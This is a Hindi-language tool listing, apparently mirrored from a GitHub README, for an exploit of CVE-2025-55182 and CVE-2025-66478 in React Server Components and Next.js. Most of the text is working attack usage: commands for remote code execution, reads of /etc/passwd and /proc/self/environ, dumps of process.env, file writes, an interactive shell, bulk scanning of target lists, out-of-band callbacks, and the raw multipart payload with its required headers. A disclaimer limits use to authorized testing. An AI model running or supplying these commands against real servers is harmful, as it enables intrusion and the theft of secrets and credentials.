CVE-2025-55182-Exploit-PoC-Scanner — # CVE-2025-55182 और CVE-2025-66478 के लिए एक्सप्लॉइट टूल
React Server Components और Next.js में इन कमजोरियों के लिए एक्सप्लॉइट टूल, जिसमें RCE गैजेट्स, फ़ाइल रीड/राइट, OOB कॉलबैक, और अधिकृत सुरक्षा परीक्षण के लिए इंटरैक्टिव शेल शामिल हैं। | Kitploit
उपकरण / GitHub / zemarkhos / cve-2025-55182-exploit-poc-scanner
zemarkhos/cve-2025-55182-exploit-poc-scanner
CVE-2025-55182-Exploit-PoC-Scanner # CVE-2025-55182 और CVE-2025-66478 के लिए एक्सप्लॉइट टूल
React Server Components और Next.js में इन कमजोरियों के लिए एक्सप्लॉइट टूल, जिसमें RCE गैजेट्स, फ़ाइल रीड/राइट, OOB कॉलबैक, और अधिकृत सुरक्षा परीक्षण के लिए इंटरैक्टिव शेल शामिल हैं।
2 1 5 9 महीने पहलेहमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।
पिछले 7 दिन पिछले 30 दिन
CVE-2025-55182 - React Server Components RCE एक्सप्लॉइट v2.0
React Server Components (RSC) और Next.js Server Actions में CVE-2025-55182 और CVE-2025-66478 कमजोरियों के परीक्षण के लिए एक व्यापक सुरक्षा अनुसंधान उपकरण।
कमजोरी सिंहावलोकन
CVE ID CVE-2025-55182, CVE-2025-66478 CVSS स्कोर 10.0 (CRITICAL) प्रभावित संस्करण React < 19.2.0, Next.js < 15.0.5 कमजोरी प्रकार Remote Code Execution (RCE) हमला वेक्टर नेटवर्क
विशेषताएँ
PortSwigger-शैली कमजोरी स्कैनिंग, कई डिटेक्शन पेलोड के साथ
कई RCE गैजेट्स (execSync, spawnSync, vm.runInThisContext, आदि)
ब्लाइंड RCE सत्यापन के लिए आउट-ऑफ-बैंड (OOB) कॉलबैक परीक्षण
फ़ाइल पढ़ने/लिखने की क्षमताएँ
JavaScript कोड निष्पादन
इंटरैक्टिव शेल मोड
मल्टी-थ्रेडिंग के साथ बल्क स्कैनिंग
प्रॉक्सी समर्थन (Burp Suite संगत)
JSON/टेक्स्ट आउटपुट प्रारूप
इंस्टॉलेशन
आवश्यकताएँ
Python संस्करण
त्वरित प्रारंभ # Basic vulnerability check
python3 exploit-custom.py -u https://target.com --check
# Full vulnerability scan (recommended)
python3 exploit-custom.py -u https://target.com --scan
# With proxy (Burp Suite)
python3 exploit-custom.py -u https://target.com --scan -p http://127.0.0.1:8080
# OOB callback test
python3 exploit-custom.py -u https://target.com --oob your-id.oastify.com
# Command execution
python3 exploit-custom.py -u https://target.com --cmd "whoami"
# Interactive shell
python3 exploit-custom.py -u https://target.com --shell
उपयोग
कमांड लाइन तर्क usage: exploit-custom.py [-h] (-u URL | -l URL_LIST) [-p PROXY] [-c COOKIES]
[-H HEADER] [-t THREADS] [--timeout TIMEOUT]
[--check] [--detect] [--scan] [--test-all]
[--oob HOST] [--cmd CMD] [--gadget GADGET]
[--read FILE] [--write FILE CONTENT] [--js JS]
[--shell] [-o OUTPUT] [-q]
लक्ष्य चयन तर्क विवरण उदाहरण -u, --urlएकल लक्ष्य URL -u https://target.com-l, --listURL वाली फ़ाइल -l targets.txt
स्कैनिंग मोड तर्क विवरण --detectNext.js/RSC उपयोग का पता लगाएँ --checkत्वरित कमजोरी जाँच (गणित परीक्षण) --scanपूर्ण कमजोरी स्कैन (PortSwigger शैली) --test-allसभी गैजेट्स और डिटेक्शन पेलोड का परीक्षण करें
शोषण तर्क विवरण उदाहरण --cmdशेल कमांड निष्पादित करें --cmd "id"--gadgetउपयोग के लिए गैजेट निर्दिष्ट करें --gadget execSync--readलक्ष्य से फ़ाइल पढ़ें --read /etc/passwd--writeलक्ष्य पर फ़ाइल लिखें --write /tmp/test.txt "content"--jsJavaScript कोड निष्पादित करें --js "process.env"--shellइंटरैक्टिव शेल प्रारंभ करें --shell--oobOOB कॉलबैक होस्ट --oob xyz.oastify.com
कनेक्शन विकल्प तर्क विवरण उदाहरण -p, --proxyHTTP/HTTPS प्रॉक्सी -p http://127.0.0.1:8080-c, --cookiesकुकी स्ट्रिंग -c "session=abc123"-H, --headerअतिरिक्त हेडर (दोहराने योग्य) -H "X-Custom: value"-t, --threadsबल्क स्कैन के लिए थ्रेड संख्या -t 20--timeoutसेकंड में अनुरोध टाइमआउट --timeout 60
आउटपुट विकल्प तर्क विवरण -o, --outputपरिणाम फ़ाइल में सहेजें (.json या .txt) -q, --quietबैनर छुपाएँ
स्कैनिंग उदाहरण
एकल लक्ष्य # Detect Next.js and RSC
python3 exploit-custom.py -u https://target.com --detect
# Quick vulnerability check
python3 exploit-custom.py -u https://target.com --check
# Full scan with all detection payloads
python3 exploit-custom.py -u https://target.com --scan
# Test all gadgets with OOB verification
python3 exploit-custom.py -u https://target.com --test-all --oob xyz.oastify.com
बल्क स्कैनिंग # Scan multiple targets
python3 exploit-custom.py -l targets.txt --scan -o results.json
# With increased threads
python3 exploit-custom.py -l targets.txt --scan -t 20 -o results.json
# With OOB callbacks
python3 exploit-custom.py -l targets.txt --oob xyz.oastify.com -o results.json
शोषण उदाहरण
कमांड निष्पादन # Using default gadget (execSync)
python3 exploit-custom.py -u https://target.com --cmd "whoami"
# Using specific gadget
python3 exploit-custom.py -u https://target.com --cmd "id" --gadget spawnSync
python3 exploit-custom.py -u https://target.com --cmd "cat /etc/passwd" --gadget execFileSync
फ़ाइल संचालन # Read file
python3 exploit-custom.py -u https://target.com --read /etc/passwd
python3 exploit-custom.py -u https://target.com --read /proc/self/environ
# Write file
python3 exploit-custom.py -u https://target.com --write /tmp/pwned.txt "pwned"
JavaScript निष्पादन # Get environment variables
python3 exploit-custom.py -u https://target.com --js "JSON.stringify(process.env)"
# Get hostname
python3 exploit-custom.py -u https://target.com --js "require('os').hostname()"
# List directory
python3 exploit-custom.py -u https://target.com --js "require('fs').readdirSync('/')"
इंटरैक्टिव शेल python3 exploit-custom.py -u https://target.com --shell
कमांड विवरण <command>शेल कमांड निष्पादित करें !read <file>फ़ाइल पढ़ें !write <file> <content>फ़ाइल लिखें !js <code>JavaScript निष्पादित करें !gadget <name>गैजेट बदलें exitशेल से बाहर निकलें
उपलब्ध गैजेट्स
RCE गैजेट्स नाम मॉड्यूल ID विवरण execSyncchild_process#execSync सीधा शेल कमांड निष्पादन execFileSyncchild_process#execFileSync बाइनरी फ़ाइल निष्पादित करें spawnSyncchild_process#spawnSync तर्कों के साथ प्रोसेस स्पॉन करें vm_runInThisContextvm#runInThisContext वर्तमान संदर्भ में JS निष्पादित करें vm_runInNewContextvm#runInNewContext सैंडबॉक्स एस्केप के साथ JS निष्पादित करें vm_runInThisContext_globalvm#runInThisContext global.process के माध्यम से निष्पादित करें
फ़ाइल गैजेट्स नाम मॉड्यूल ID विवरण fs_readFileSyncfs#readFileSync मनमानी फ़ाइलें पढ़ें fs_writeFileSyncfs#writeFileSync मनमानी फ़ाइलें लिखें
OOB गैजेट्स नाम विवरण vm_fetchfetch API के माध्यम से HTTP अनुरोध (Node 18+) vm_httphttp मॉड्यूल के माध्यम से HTTP अनुरोध
डिटेक्शन पेलोड (CVE-2025-66478) --scan मोड इन PortSwigger-शैली डिटेक्शन पेलोड का उपयोग करता है:
पेलोड विवरण property_referenceकोलन-सीमांकित प्रॉपर्टी रेफरेंस ["$1:a:a"] property_reference_v2वैकल्पिक रेफरेंस ["$1:b:b"] property_reference_constructorप्रॉपर्टी रेफरेंस के माध्यम से कंस्ट्रक्टर एक्सेस property_reference_protoप्रॉपर्टी रेफरेंस के माध्यम से प्रोटो चेन एक्सेस action_ref_vmvm#runInThisContext के साथ ACTION_REF action_ref_execSyncchild_process#execSync के साथ ACTION_REF
OOB कॉलबैक विधियाँ यह उपकरण कई OOB कॉलबैक विधियों का समर्थन करता है:
विधि विवरण curlcurl कमांड के माध्यम से HTTP अनुरोध wgetwget कमांड के माध्यम से HTTP अनुरोध nslookupDNS क्वेरी pingICMP पिंग fetchNode.js fetch API httpNode.js http मॉड्यूल
आउटपुट व्याख्या
टर्मिनल रंग रंग स्थिति अर्थ हरा [VULN]कमजोर - RCE की पुष्टि हुई पीला [PATCH]पैच किया गया - Server Actions सक्रिय लेकिन सुरक्षित नीला [RSC]Server Actions का पता चला सियान [NEXT]Next.js का पता चला लाल [ERR]कनेक्शन त्रुटि
स्कैन परिणाम [VULN] property_reference Vulnerable pattern detected!
-> Error digest pattern: E{"digest"... (needs OOB verification)
[SAFE] property_reference_v2 HTTP 200
[500] action_ref_vm digest:12345
तकनीकी विवरण
RSC फ्लाइट प्रारूप यह उपकरण React Server Components के "फ्लाइट प्रारूप" प्रतिक्रियाओं को पार्स करता है:
0:{"a":"$@1","b":"$@2"}
1:E{"digest":"12345"}
मल्टीपार्ट पेलोड संरचना ------CVE2025Boundary
Content-Disposition: form-data; name="$ACTION_REF_0"
------CVE2025Boundary
Content-Disposition: form-data; name="$ACTION_0:0"
{"id":"child_process#execSync","bound":["whoami"]}
------CVE2025Boundary--
आवश्यक HTTP हेडर Content-Type: multipart/form-data; boundary=----CVE2025Boundary
Accept: text/x-component
Next-Action: <random-uuid>
RSC: 1
Next-Router-State-Tree: [[["",{"children":["__PAGE__",{}]},null,null,true]]
पैच किए गए संस्करण
React
Next.js
15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7, 16.0.7
उपयोग के मामले
बग बाउंटी # 1. Prepare target list
echo "https://app.example.com" > targets.txt
echo "https://api.example.com" >> targets.txt
# 2. Bulk scan
python3 exploit-custom.py -l targets.txt --scan -o results.json
# 3. Verify with OOB
python3 exploit-custom.py -u https://vuln.example.com --oob your-id.oastify.com
पेनेट्रेशन परीक्षण # 1. Detect technology
python3 exploit-custom.py -u https://target.com --detect
# 2. Analyze with Burp
python3 exploit-custom.py -u https://target.com --scan -p http://127.0.0.1:8080
# 3. Exploit
python3 exploit-custom.py -u https://target.com --shell
संदर्भ
कानूनी अस्वीकरण यह उपकरण केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उद्देश्यों के लिए प्रदान किया गया है।
चेतावनी: कंप्यूटर सिस्टम तक अनधिकृत पहुँच अवैध है। इस उपकरण का उपयोग केवल उन्हीं सिस्टमों पर करें जिनके स्वामी आप हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट लिखित अनुमति है।
लेखक इस उपकरण के किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं हैं।
लाइसेंस यह उपकरण सुरक्षा अनुसंधान और अधिकृत पेनेट्रेशन परीक्षण उद्देश्यों के लिए जारी किया गया है।
लेखक: Ünsal Furkan Harani
संस्करण: 2.0